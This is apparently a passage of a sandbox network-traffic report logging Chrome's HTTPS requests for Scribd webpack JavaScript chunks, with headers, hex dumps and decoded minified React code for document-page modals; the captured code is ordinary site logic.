                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 3851
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 03 Dec 2024 23:37:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "a2aac2a66975c49cfa2b8d1a978da0e6"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 242099
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740022-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522385.181218,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 34 5d 2c 7b 39 32 32 31 34 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 62 7d 29 3b 76 61 72 20 6e 3d 72 28 39 36 35 34 30 29 2c 61 3d 72 28 33 38 35 34 34 29 2c 69 3d 72 28 34 30 38 38 30 29 2c 6f 3d 72 28 33 37 35 39 34 29 2c 6c 3d 72 28 37 37 34 33 34 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 7b 68 69 64 65 5f 6d 6f 64 61 6c 3a 65 7d 29 7b 63 6f 6e 73 74 20 74 3d 28 30 2c 61 2e 64 34 29 28
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[214],{92214:(e,t,r)=>{r.r(t),r.d(t,{default:()=>b});var n=r(96540),a=r(38544),i=r(40880),o=r(37594),l=r(77434);function s({hide_modal:e}){const t=(0,a.d4)(
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 50 61 67 65 2e 6d 6f 64 61 6c 73 2e 44 65 73 63 72 69 70 74 69 6f 6e 2e 44 65 73 63 72 69 70 74 69 6f 6e 2e 64 6f 63 75 6d 65 6e 74 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 22 29 3a 69 2e 41 2e 74 28 22 64 6f 63 5f 70 61 67 65 2e 64 65 73 63 72 69 70 74 69 6f 6e 5f 6d 6f 64 61 6c 2e 64 65 73 63 72 69 70 74 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 4d 6f 64 61 6c 54 69 74 6c 65 45 6c 65 6d 65 6e 74 28 7b 74 69 74 6c 65 3a 65 7d 29 7d 29 29 2c 66 28 74 68 69 73 2c 22 72 65 6e 64 65 72 42 65 6c 6f 77 54 69 74 6c 65 22 2c 28 28 29 3d 3e 7b 63 6f 6e 73 74 7b 65 78 74 72 61 63 74 65 64 54 69 74 6c 65 3a 65 2c 6f 72 69 67 69 6e 61 6c 44 65 73 63 72 69 70 74 69 6f 6e 3a 74 2c 67 65 6e 65 72 61 74 65 64 44 65 73 63 72 69 70 74 69 6f 6e 3a 72 7d 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Page.modals.Description.Description.document_information"):i.A.t("doc_page.description_modal.description");return this.getModalTitleElement({title:e})})),f(this,"renderBelowTitle",(()=>{const{extractedTitle:e,originalDescription:t,generatedDescription:r}=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1095INData Raw: 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 72 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 72 2c 65 7d 63 6c 61 73 73 20 73 20 65 78 74 65 6e 64 73 20 69 2e 43 6f 6d 70 6f 6e 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 65 29 2c 6c 28 74 68 69 73 2c 22 63 6c 6f 73 65 22 2c 28 28 29 3d 3e 7b 74 68 69 73 2e 70 72 6f 70 73 2e 63 6c 6f 73 65 5f 6d 6f 64 61 6c 28 74 68 69 73 2e 70 72 6f 70 73 2e 69 64 29 7d 29 29 7d 61 64 64 57 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 73 28 65 3d 6e 75 6c 6c 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 64 64 69 74 69 6f 6e 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e}class s extends i.Component{constructor(e){super(e),l(this,"close",(()=>{this.props.close_modal(this.props.id)}))}addWrapperClassNames(e=null){return this.additiona


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        146192.168.2.1649892151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC698OUTGET /webpack/doc_page/213.76c9ff.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Purpose: prefetch
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC579INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 16587
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 19:31:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "a72f49be598a8bdfd387525069e9ebe7"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740045-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522385.182745,VS0,VE119
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 33 5d 2c 7b 36 30 31 36 34 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 6e 3d 61 28 36 32 38 33 32 29 2c 6f 3d 61 2e 6e 28 6e 29 2c 72 3d 61 28 39 36 35 34 30 29 2c 73 3d 61 28 33 38 39 37 39 29 2c 6c 3d 61 28 31 31 38 36 35 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 2c 61 29 7b 72 65 74 75 72 6e 28 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[213],{60164:(e,t,a)=>{a.d(t,{A:()=>c});var n=a(62832),o=a.n(n),r=a(96540),s=a(38979),l=a(11865);function d(e,t,a){return(t=function(e){var t=function(e,t){
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 3a 75 2c 66 6f 63 75 73 65 64 3a 74 68 69 73 2e 73 74 61 74 65 2e 66 6f 63 75 73 65 64 2c 77 69 74 68 5f 64 65 73 63 72 69 70 74 69 6f 6e 3a 74 7d 29 2c 68 74 6d 6c 46 6f 72 3a 6e 7c 7c 74 68 69 73 2e 75 69 64 28 5f 29 2c 6f 6e 46 6f 63 75 73 3a 74 68 69 73 2e 68 61 6e 64 6c 65 46 6f 63 75 73 2c 6f 6e 42 6c 75 72 3a 74 68 69 73 2e 68 61 6e 64 6c 65 42 6c 75 72 2c 6f 6e 4b 65 79 44 6f 77 6e 3a 6d 7d 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 2e 73 36 2c 6e 75 6c 6c 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 2c 7b 22 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 22 3a 74 3f 74 68 69 73 2e 75 69 64 28 22 64 65 73 63 72 69 70 74 69 6f 6e 22 29 3a 6e 75 6c 6c 2c 63 68 65 63 6b 65 64 3a 75 2c 63 6c 61 73 73 4e 61 6d 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :u,focused:this.state.focused,with_description:t}),htmlFor:n||this.uid(_),onFocus:this.handleFocus,onBlur:this.handleBlur,onKeyDown:m},r.createElement(s.s6,null,r.createElement("input",{"aria-describedby":t?this.uid("description"):null,checked:u,className
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 38 31 29 22 7d 2c 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 63 6c 69 70 50 61 74 68 3a 22 75 72 6c 28 23 61 29 22 2c 64 3a 22 6d 32 31 34 2e 36 36 36 20 33 38 32 63 2d 37 2e 37 33 32 20 30 2d 31 34 20 36 2e 32 36 39 2d 31 34 20 31 34 20 30 20 37 2e 37 33 32 20 36 2e 32 36 38 20 31 34 20 31 34 20 31 34 73 31 34 2d 36 2e 32 36 38 20 31 34 2d 31 34 63 30 2d 37 2e 37 33 31 2d 36 2e 32 36 38 2d 31 34 2d 31 34 2d 31 34 6d 30 20 32 33 2e 38 38 32 63 2d 35 2e 34 34 39 20 30 2d 39 2e 38 38 33 2d 34 2e 34 33 33 2d 39 2e 38 38 33 2d 39 2e 38 38 32 20 30 2d 35 2e 34 34 38 20 34 2e 34 33 34 2d 39 2e 38 38 33 20 39 2e 38 38 33 2d 39 2e 38 38 33 73 39 2e 38 38 33 20 34 2e 34 33 35 20 39 2e 38 38 33 20 39 2e 38 38 33 63 30 20 35 2e 34 34 39
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 81)"},s.createElement("path",{clipPath:"url(#a)",d:"m214.666 382c-7.732 0-14 6.269-14 14 0 7.732 6.268 14 14 14s14-6.268 14-14c0-7.731-6.268-14-14-14m0 23.882c-5.449 0-9.883-4.433-9.883-9.882 0-5.448 4.434-9.883 9.883-9.883s9.883 4.435 9.883 9.883c0 5.449
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 2e 46 49 58 5f 50 41 59 4d 45 4e 54 3f 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 4e 2e 74 65 78 74 2c 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 3a 7b 5f 5f 68 74 6d 6c 3a 72 2e 41 2e 74 28 22 73 68 61 72 65 64 2e 64 6f 63 5f 64 6f 77 6e 6c 6f 61 64 5f 6d 6f 64 61 6c 2e 74 68 65 72 65 5f 77 61 73 5f 61 6e 5f 69 73 73 75 65 5f 77 69 74 68 5f 70 61 79 6d 65 6e 74 5f 68 74 6d 6c 22 2c 7b 72 65 73 75 62 73 63 72 69 62 65 50 61 74 68 3a 74 7d 29 7d 7d 29 3a 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 4e 2e 74 65 78 74 2c 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 3a 7b 5f 5f 68 74 6d 6c 3a 72 2e 41 2e 74 28 22
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .FIX_PAYMENT?s.createElement("p",{className:N.text,dangerouslySetInnerHTML:{__html:r.A.t("shared.doc_download_modal.there_was_an_issue_with_payment_html",{resubscribePath:t})}}):s.createElement("p",{className:N.text,dangerouslySetInnerHTML:{__html:r.A.t("
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 45 7d 29 7b 63 6f 6e 73 74 20 78 3d 28 30 2c 6c 2e 64 34 29 28 28 65 3d 3e 65 2e 77 6f 72 64 44 6f 63 75 6d 65 6e 74 2e 69 64 29 29 2c 4e 3d 28 30 2c 6c 2e 64 34 29 28 28 65 3d 3e 65 2e 77 6f 72 64 44 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 29 29 2c 43 3d 28 30 2c 6c 2e 64 34 29 28 28 65 3d 3e 65 2e 67 6c 6f 62 61 6c 2e 70 61 74 68 73 2e 70 72 6f 70 73 2e 64 6f 77 6e 6c 6f 61 64 5f 72 65 63 65 69 70 74 5f 6d 6f 64 61 6c 29 29 2c 52 3d 28 30 2c 6c 2e 77 41 29 28 29 2c 4f 3d 28 30 2c 73 2e 75 73 65 52 65 66 29 28 6e 65 77 20 44 61 74 65 29 2c 5b 6b 2c 4c 5d 3d 28 30 2c 73 2e 75 73 65 53 74 61 74 65 29 28 76 2e 55 4e 50 41 49 44 29 2c 5b 4d 2c 46 5d 3d 28 30 2c 73 2e 75 73 65 53 74 61 74 65 29 28 7b 7d 29 3b 28 30 2c 73 2e 75 73 65 45 66 66 65 63 74 29 28 28
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: E}){const x=(0,l.d4)((e=>e.wordDocument.id)),N=(0,l.d4)((e=>e.wordDocument.title)),C=(0,l.d4)((e=>e.global.paths.props.download_receipt_modal)),R=(0,l.wA)(),O=(0,s.useRef)(new Date),[k,L]=(0,s.useState)(v.UNPAID),[M,F]=(0,s.useState)({});(0,s.useEffect)((
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 6c 2e 75 70 67 72 61 64 65 5f 79 6f 75 72 5f 74 72 69 61 6c 22 29 29 2c 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 54 2e 63 6f 6e 74 65 6e 74 43 6f 6e 74 61 69 6e 65 72 7d 2c 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 22 2c 6e 75 6c 6c 2c 72 2e 41 2e 74 28 22 73 68 61 72 65 64 2e 64 6f 63 5f 64 6f 77 6e 6c 6f 61 64 5f 6d 6f 64 61 6c 2e 79 6f 75 5f 75 73 65 64 5f 61 6c 6c 5f 64 6f 77 6e 6c 6f 61 64 73 22 29 29 2c 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 22 2c 6e 75 6c 6c 2c 72 2e 41 2e 74 28 22 73 68 61 72 65 64 2e 64 6f 63 5f 64 6f 77 6e 6c 6f 61 64 5f 6d 6f 64 61 6c 2e 63 6f 6e 74 69 6e 75 65 5f 72 65 61 64 69 6e 67 5f 61 64 5f 66 72 65 65 5f 6f 72 5f 75 70 67 72 61 64 65 22
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l.upgrade_your_trial")),s.createElement("div",{className:T.contentContainer},s.createElement("p",null,r.A.t("shared.doc_download_modal.you_used_all_downloads")),s.createElement("p",null,r.A.t("shared.doc_download_modal.continue_reading_ad_free_or_upgrade"
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 3b 32 30 30 21 3d 3d 61 2e 73 74 61 74 75 73 43 6f 64 65 26 26 48 28 29 2c 74 2e 73 75 63 63 65 73 73 3f 28 4c 28 76 2e 53 55 43 43 45 53 53 29 2c 28 30 2c 6c 2e 76 41 29 28 28 28 29 3d 3e 7b 52 28 28 30 2c 66 2e 4a 59 29 28 65 29 29 2c 52 28 66 75 6e 63 74 69 6f 6e 28 7b 64 69 73 70 61 74 63 68 3a 65 2c 64 6f 77 6e 6c 6f 61 64 4d 6f 64 61 6c 50 72 6f 70 73 50 61 74 68 3a 74 2c 64 6f 63 75 6d 65 6e 74 49 64 3a 61 2c 64 6f 63 75 6d 65 6e 74 54 69 74 6c 65 3a 6e 2c 68 61 73 53 75 63 63 65 73 73 66 75 6c 50 61 79 6d 65 6e 74 3a 6f 7d 29 7b 65 28 28 30 2c 66 2e 64 74 29 28 7b 6e 61 6d 65 3a 49 2e 52 38 2e 44 4f 57 4e 4c 4f 41 44 2c 70 72 6f 70 73 50 61 74 68 3a 74 2c 75 73 65 72 41 63 74 69 6f 6e 3a 50 2e 6b 66 2e 55 53 45 52 5f 41 43 54 49 4f 4e 53 2e 44 4f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ;200!==a.statusCode&&H(),t.success?(L(v.SUCCESS),(0,l.vA)((()=>{R((0,f.JY)(e)),R(function({dispatch:e,downloadModalPropsPath:t,documentId:a,documentTitle:n,hasSuccessfulPayment:o}){e((0,f.dt)({name:I.R8.DOWNLOAD,propsPath:t,userAction:P.kf.USER_ACTIONS.DO
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 65 6e 74 28 4f 2e 41 2c 6e 75 6c 6c 2c 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 77 72 61 70 70 65 72 5f 5f 64 6f 63 5f 70 61 67 65 5f 64 6f 77 6e 6c 6f 61 64 5f 6d 6f 64 61 6c 5f 63 61 72 6f 75 73 65 6c 22 2c 22 64 61 74 61 2d 65 32 65 22 3a 22 64 6f 77 6e 6c 6f 61 64 5f 6d 6f 64 61 6c 5f 63 61 72 6f 75 73 65 6c 22 7d 2c 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 68 32 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 63 61 72 6f 75 73 65 6c 5f 74 69 74 6c 65 22 7d 2c 72 2e 41 2e 74 28 22 73 68 61 72 65 64 2e 64 6f 63 5f 64 6f 77 6e 6c 6f 61 64 5f 6d 6f 64 61 6c 2e 63 68 65 63 6b 5f 6f 75 74 5f 74 68 65 73 65 22 29 29 2c 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6b 2e 41 2c 7b 63 6c 61 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ent(O.A,null,s.createElement("div",{className:"wrapper__doc_page_download_modal_carousel","data-e2e":"download_modal_carousel"},s.createElement("h2",{className:"carousel_title"},r.A.t("shared.doc_download_modal.check_out_these")),s.createElement(k.A,{clas
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 28 74 68 69 73 2c 22 67 65 74 4d 65 6e 75 49 74 65 6d 73 22 2c 28 65 3d 3e 65 2e 6d 61 70 28 28 28 65 2c 74 29 3d 3e 28 7b 76 61 6c 75 65 3a 74 2c 6c 61 62 65 6c 3a 60 24 7b 65 2e 65 78 74 65 6e 73 69 6f 6e 7d 20 28 24 7b 65 2e 66 69 6c 65 73 69 7a 65 7d 29 60 7d 29 29 29 29 29 2c 48 28 74 68 69 73 2c 22 72 65 6e 64 65 72 46 6f 72 6d 61 74 22 2c 28 28 65 2c 74 29 3d 3e 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 42 2e 41 2c 7b 63 6c 61 73 73 3a 22 69 6e 70 75 74 5f 69 74 65 6d 22 2c 6b 65 79 3a 65 2e 65 78 74 65 6e 73 69 6f 6e 2c 6c 61 62 65 6c 54 65 78 74 3a 60 24 7b 65 2e 65 78 74 65 6e 73 69 6f 6e 7d 20 28 24 7b 65 2e 66 69 6c 65 73 69 7a 65 7d 29 60 2c 6f 6e 43 68 61 6e 67 65 3a 74 68 69 73 2e 68 61 6e 64 6c 65 53 65 6c 65 63 74 69 6f 6e 2c 73 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (this,"getMenuItems",(e=>e.map(((e,t)=>({value:t,label:`${e.extension} (${e.filesize})`}))))),H(this,"renderFormat",((e,t)=>s.createElement(B.A,{class:"input_item",key:e.extension,labelText:`${e.extension} (${e.filesize})`,onChange:this.handleSelection,se
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC1378INData Raw: 65 2c 77 69 64 74 68 3a 22 31 22 2c 68 65 69 67 68 74 3a 22 31 22 2c 74 69 74 6c 65 3a 72 2e 41 2e 74 28 22 72 65 63 65 69 70 74 2e 64 6f 77 6e 6c 6f 61 64 2e 64 6f 77 6e 6c 6f 61 64 5f 69 66 72 61 6d 65 22 29 2c 66 72 61 6d 65 42 6f 72 64 65 72 3a 22 30 22 2c 73 74 79 6c 65 3a 7b 64 69 73 70 6c 61 79 3a 22 6e 6f 6e 65 22 7d 2c 73 72 63 3a 28 30 2c 57 2e 79 5f 29 28 65 2c 74 68 69 73 2e 70 72 6f 70 73 2e 64 6f 63 75 6d 65 6e 74 29 7d 29 7d 29 29 2c 48 28 74 68 69 73 2c 22 72 65 6e 64 65 72 44 6f 77 6e 6c 6f 61 64 43 6f 6e 74 65 6e 74 22 2c 28 28 29 3d 3e 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 63 6f 6e 74 65 6e 74 5f 77 72 61 70 70 65 72 22 7d 2c 74 68 69 73 2e 72 65 6e 64 65 72 53 65 6c 65 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e,width:"1",height:"1",title:r.A.t("receipt.download.download_iframe"),frameBorder:"0",style:{display:"none"},src:(0,W.y_)(e,this.props.document)})})),H(this,"renderDownloadContent",(()=>s.createElement("div",{className:"content_wrapper"},this.renderSelec


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        147192.168.2.1649887151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC698OUTGET /webpack/doc_page/219.4025f4.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Purpose: prefetch
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:45 UTC580INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 3368
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 22 Nov 2024 00:07:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "235c4b4e2de0058491a1fea6b0d5e902"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 201444
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740070-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522385.182386,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
